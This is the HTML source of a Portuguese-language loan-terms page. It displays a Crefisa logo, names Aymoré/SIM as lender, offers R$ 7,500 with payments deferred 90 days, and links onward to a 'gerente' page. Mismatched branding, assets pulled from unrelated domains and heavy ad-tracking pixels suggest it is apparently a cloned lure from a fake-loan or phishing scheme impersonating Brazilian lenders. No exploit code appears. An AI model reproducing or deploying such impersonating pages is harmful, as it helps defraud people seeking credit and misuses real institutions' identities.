<html data-capo="" style="--primary: #FE0064;">
    
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    
    <head>
      <meta charset="UTF-8">


<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="https://pesquisa.plus/type-pac/js/fbevents.js"></script>
<!-- End Meta Pixel Code -->

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Empréstimo facilitado, simulação gratuita!</title>
  <style>
    /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
    *,
    :after,
    :before {
      box-sizing: border-box
    }

    html {
      font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
      line-height: 1.15;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      -o-tab-size: 4;
      tab-size: 4
    }

    body {
      margin: 0
    }

    hr {
      color: inherit;
      height: 0
    }

    abbr[title] {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      border-color: inherit;
      text-indent: 0
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0
    }

    button,
    select {
      text-transform: none
    }

    [type=button],
    [type=reset],
    [type=submit],
    button {
      -webkit-appearance: button
    }

    ::-moz-focus-inner {
      border-style: none;
      padding: 0
    }

    :-moz-focusring {
      outline: 1px dotted ButtonText
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    legend {
      padding: 0
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }
  </style>
  <style>
    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    ol,
    p,
    pre,
    ul {
      margin: 0
    }

    ol,
    ul {
      list-style: none;
      padding: 0
    }

    img,
    video {
      height: auto;
      max-width: 100%
    }

    *,
    :after,
    :before {
      border: 0 solid #000
    }

    :root {
      --primary: transparent;
      --red: #ef4444;
      --green: #27ae60
    }

    body {
      background-color: #fff;
      color: #000;
      font-size: 16px
    }

    #__nuxt,
    body,
    html {
      height: 100%
    }

    a {
      color: #1b98e0;
      text-decoration: none
    }

    a:hover {
      cursor: pointer;
      text-decoration: underline
    }

    .text-red {
      color: var(--red)
    }

    .text-green {
      color: var(--green)
    }

    .text-primary {
      color: var(--primary)
    }

    h2 {
      font-weight: 500
    }
  </style>
  <style>
    .default-layout[data-v-77968890] {
      display: grid;
      grid-template-areas: "top-bar" "content" "footer";
      grid-template-rows: auto 1fr auto;
      min-height: 100vh
    }

    .default-layout .top-bar[data-v-77968890] {
      grid-area: top-bar
    }

    .default-layout .content[data-v-77968890] {
      background-color: #f5f7f9;
      grid-area: content
    }

    .default-layout .footer[data-v-77968890] {
      grid-area: footer
    }
  </style>
  <style>
    .top-bar[data-v-f5d5d4cd] {
      background-color: var(--primary);
      border-bottom: 1px solid hsla(0, 0%, 100%, .3);
      width: 100%
    }

    .top-bar .container[data-v-f5d5d4cd] {
      display: grid;
      padding: 1.5rem 0;
      place-content: center
    }
  </style>
  <style>
    .container[data-v-0041013f] {
      box-sizing: border-box;
      margin: 0 auto;
      padding-left: 1rem;
      padding-right: 1rem
    }

    @media (min-width:640px) {
      .container[data-v-0041013f] {
        max-width: 90%
      }
    }

    @media (min-width:768px) {
      .container[data-v-0041013f] {
        max-width: 85%
      }
    }

    @media (min-width:1024px) {
      .container[data-v-0041013f] {
        max-width: 80%
      }
    }

    @media (min-width:1280px) {
      .container[data-v-0041013f] {
        max-width: 1000px
      }
    }
  </style>
  <style>
    img.logo[data-v-4f7075cc] {
      height: var(--2348ed9e);
      width: auto
    }

    h1.logo[data-v-4f7075cc] {
      color: #fff;
      text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
    }
  </style>
  <style>
    .card[data-v-f9269b1b] {
      display: grid;
      gap: 1rem
    }

    .card .address-form[data-v-f9269b1b] {
      margin-top: 1rem
    }

    a[data-v-f9269b1b] {
      background: var(--primary);
      border-radius: 1rem;
      color: #fff;
      cursor: pointer;
      font-weight: 500;
      letter-spacing: .3px;
      padding: .75rem 3rem;
      transition: opacity .1s;
      width: -moz-max-content;
      width: max-content
    }
  </style>
  <style>
    .central-wrapper[data-v-4dac45b6] {
      margin: 2.5rem 0
    }

    .container[data-v-4dac45b6] {
      display: grid;
      gap: 1rem;
      max-width: 480px;
      place-items: center
    }
  </style>
  <style>
    .card[data-v-cca10726] {
      background-color: #fff;
      border-radius: 10px;
      box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
      padding: 1.5rem;
      width: 100%
    }
  </style>
  <style>
    .card-title[data-v-303a1430] {
      color: #000;
      font-size: 1.35rem;
      font-weight: 500
    }
  </style>
  <style>
    .card-sub-title[data-v-2901cb0a] {
      color: rgba(0, 0, 0, .5);
      line-height: 1.5
    }
  </style>
  <style>
    .footer[data-v-63f14862] {
      border-bottom: 7px solid var(--primary);
      border-top: 2px solid #edf0ef;
      color: #fff;
      color: #000;
      padding: 2rem 0;
      text-align: center
    }

    .footer p[data-v-63f14862] {
      margin: .5rem 0
    }
  </style>
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/TopBar.2vF9lWx7.css">
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Container.B5PP9_Vn.css">
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CardTitle.D2C4NpE7.css">
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CardSubTitle.DG_Fs8af.css">
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Card.GBBMdh4F.css">
  <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CentralWrapper.Jxhi_ayc.css">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/k9y74een.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Bo8ipC1T.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/2aeojNjQ.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Coyod-Dc.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DTnGPJep.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/B1xLFNhR.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/sv4npInL.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BxXuEPsU.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/MaghENf1.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BJRZzHYv.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CV182wBC.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/J9e3dA3M.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/D-UNq_Tu.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BGBp0rdz.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Wpn3EkJ-.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CKC6fHHG.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BhOEMyyX.js">
  <script type="text/javascript" async="" src="js/events_3.js"></script>
  <script type="text/javascript" async="" src="js/events_2_1.js"></script>
  <script type="text/javascript" async="" src="js/events_1_1.js"></script>
  <script async="" src="js/fbevents_1.js"></script>
  <script src="1763225554485563-1.html" async=""></script>
  <script src="485377260925980-1.html" async=""></script>
  <script src="378830935268765-1.html" async=""></script>
  <script src="1241138923470476-1.html" async=""></script>
  <script async="" src="js/fbevents_1.js"></script>
  <script type="module" src="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
  <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
  <script src="js/latest_1.js" async="" defer=""></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/11-terms.CC0FiJs6.css">
  <script async="" defer="" src="js/pixel_1.js"></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css"> <!-- Meta Pixel Code -->

  <!-- Meta Pixel Code -->
 
  <!-- End Meta Pixel Code -->
  <script>
    !function (e, t) { "object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t() }(window, (function () { return function (e) { var t = {}; function n(o) { if (t[o]) return t[o].exports; var r = t[o] = { i: o, l: !1, exports: {} }; return e[o].call(r.exports, r, r.exports, n), r.l = !0, r.exports } return n.m = e, n.c = t, n.d = function (e, t, o) { n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o }) }, n.r = function (e) { "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 }) }, n.t = function (e, t) { if (1 & t && (e = n(e)), 8 & t) return e; if (4 & t && "object" == typeof e && e && e.__esModule) return e; var o = Object.create(null); if (n.r(o), Object.defineProperty(o, "default", { enumerable: !0, value: e }), 2 & t && "string" != typeof e) for (var r in e) n.d(o, r, function (t) { return e[t] }.bind(null, r)); return o }, n.n = function (e) { var t = e && e.__esModule ? function () { return e.default } : function () { return e }; return n.d(t, "a", t), t }, n.o = function (e, t) { return Object.prototype.hasOwnProperty.call(e, t) }, n.p = "", n(n.s = 0) }([function (e, t, n) { "use strict"; var o = this && this.__spreadArray || function (e, t, n) { if (n || 2 === arguments.length) for (var o, r = 0, i = t.length; r < i; r++)!o && r in t || (o || (o = Array.prototype.slice.call(t, 0, r)), o[r] = t[r]); return e.concat(o || Array.prototype.slice.call(t)) }; Object.defineProperty(t, "__esModule", { value: !0 }); var r = function (e, t, n) { var o, i = e.createElement("script"); i.type = "text/javascript", i.async = !0, i.src = t, n && (i.onerror = function () { r(e, n) }); var a = e.getElementsByTagName("script")[0]; null === (o = a.parentNode) || void 0 === o || o.insertBefore(i, a) }; !function (e, t, n) { e.KwaiAnalyticsObject = n; var i = e[n] = e[n] || []; i.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie"]; var a = function (e, t) { e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) } }; i.methods.forEach((function (e) { a(i, e) })), i.instance = function (e) { var t, n = (null === (t = i._i) || void 0 === t ? void 0 : t[e]) || []; return i.methods.forEach((function (e) { a(n, e) })), n }, i.load = function (e, o) { var a = "https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js"; i._i = i._i || {}, i._i[e] = [], i._i[e]._u = a, i._t = i._t || {}, i._t[e] = +new Date, i._o = i._o || {}, i._o[e] = o || {}; var c = "?sdkid=".concat(e, "&lib=").concat(n); r(t, a + c, "https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" + c) } }(window, document, "kwaiq") }]) }));
  </script>
 
<script async="" defer="" src="js/pixel.js"></script></head>

<body>
  <div id="__nuxt">
    <div class="default-layout" data-v-77968890="">
      <style>
        .top-bar {
          background-color: white;
          border-bottom: 1px solid hsla(0, 0%, 100%, .3);
          width: 100%;
        }

        .top-bar .container {
          display: grid;
          padding: 1.5rem 0;
          place-content: center;
        }
      </style>
      <header class="top-bar">
        <div class="container">
          <h1 class="logo" data-v-f5d5d4cd="" style="--2348ed9e: 10px; color: white;" data-v-4f7075cc=""><img src="images/Crefisa.png" style="max-width:100px"></h1>
        </div>
      </header>
      <main class="content" data-v-77968890=""><!--[-->
        <div class="central-wrapper address-page" data-v-f9269b1b="" data-v-4dac45b6="">
          <div class="container" data-v-4dac45b6="" data-v-0041013f=""><!--[--><!--[-->
            <div class="card" data-v-f9269b1b="" data-v-cca10726=""><!--[--><span class="card-title" data-v-f9269b1b="" data-v-303a1430=""><!--[-->Termos do empréstimo<!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Por este instrumento, o cliente <b data-v-f9269b1b=""></b> e a empresa <b data-v-f9269b1b="">SIM (Aymoré Crédito, Financiamento e Investimento S.A.),</b> firmam o presente termo de
                empréstimo, segundo as condições a seguir: <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> O cliente solicita um empréstimo no valor total de <span id="loan">R$
                7.500,00</span> com pagamento da primeira parcela somente 90 dias após a contratação<b data-v-f9269b1b=""></b>
                <b data-v-f9269b1b=""></b> <b data-v-f9269b1b=""></b>. <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Ambas as partes concordam com os valores e condições
                estipulados neste termo. Este termo visa assegurar que tanto você quanto Aymoré Crédito, Financiamento e Investimento S.A. tenham clareza sobre o
                que foi acordado, garantindo uma relação transparente e confiável. <!--]--></span><span class="card-sub-title" data-v-f9269b1b="" data-v-2901cb0a=""><!--[--> Cordialmente,<br data-v-f9269b1b=""> Aymoré Crédito, Financiamento e Investimento S.A.<!--]--></span><!--]--></div><a href="../gerente/" style="opacity: 1;" data-v-f9269b1b="">Li e aceito os termos</a><!--]--><!--]-->
          </div>
        </div><!--]-->
      </main>
      <footer class="footer" data-v-77968890="" data-v-63f14862="">
        <div class="container" data-v-63f14862="" data-v-0041013f=""><!--[-->
          <p data-v-63f14862="">© 2024 Sim, Crédito Simples</p>
          <p data-v-63f14862="">Amador Bueno, nº474. Bloco C. 1º andar - Santo Amaro, São Paulo - SP, CEP 04752-901.</p><!--]-->
        </div>
      </footer>
    </div>
  </div>
  <div id="teleports"></div>

<script>
    function getCookie(nome) {
        const nomeEQ = `${nome}=`;
        const cookies = document.cookie.split(';');
        for (let i = 0; i < cookies.length; i++) {
            let cookie = cookies[i].trim();
            if (cookie.indexOf(nomeEQ) === 0) {
                return cookie.substring(nomeEQ.length, cookie.length);
            }
        }
        return null;
    }
    
    const limite = getCookie('limite');
    const limite2 = getCookie('limite');
    const valorFormatado = Number(limite).toLocaleString('pt-BR', {
        style: 'currency',
        currency: 'BRL',
    });
    loan.innerHTML = valorFormatado;
</script>

<script src="../scripts/utms/latest-10.js" data-utmify-prevent-subids="" async="" defer=""></script>

<script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "ppobfzii52");
</script>

</body></html>